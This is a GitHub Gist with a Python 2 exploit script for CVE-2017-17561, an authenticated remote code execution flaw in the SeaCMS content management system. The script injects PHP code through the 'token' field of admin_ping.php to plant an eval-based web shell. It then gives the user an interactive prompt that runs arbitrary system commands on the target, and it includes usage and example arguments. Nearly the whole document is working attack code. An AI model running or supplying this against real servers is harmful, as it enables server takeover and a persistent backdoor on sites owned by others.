Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
# encoding:utf-8
# Author: WangYihang
# Email: wangyihanger@gmail.com
# Comment: CVE-2017-17561 SeaCMS Authenticated Getshell
import requests
import sys
import readline
def exploit(host, port, path, session, password):
url = "http://%s:%d/%s/admin_ping.php?action=set" % (host, port, path)
data = {
"weburl":"www.seacms.net",
"token":"123456789\";$var=eval($_REQUEST[%s]).\"" % (password)
}
cookies = {
"PHPSESSID":session
}
response = requests.post(url, data=data, cookies=cookies)
print response.content
def usage(name):
print "Usage:"
print "\tpython %s [HOST] [PORT] [PATH] [PHPSESSID] [PASSWORD]" % (name)
print "Example:"
print "\tpython %s 127.0.0.1 80 admin n2njegrc8dfb5fvuckb2qbnr46 c" % (name)
def interactive(url, password):
while True:
command = raw_input("$ ")
if command == "exit":
break
data = {
password:"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", ""))
}
print requests.post(url, data=data).content
def main():
if len(sys.argv) != 6:
usage(sys.argv[0])
exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
path = sys.argv[3]
session = sys.argv[4]
password = sys.argv[5]
exploit(host, port, path, session, password)
url = "http://%s:%d/data/%s/ping.php" % (host, port, path)
interactive(url, password)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.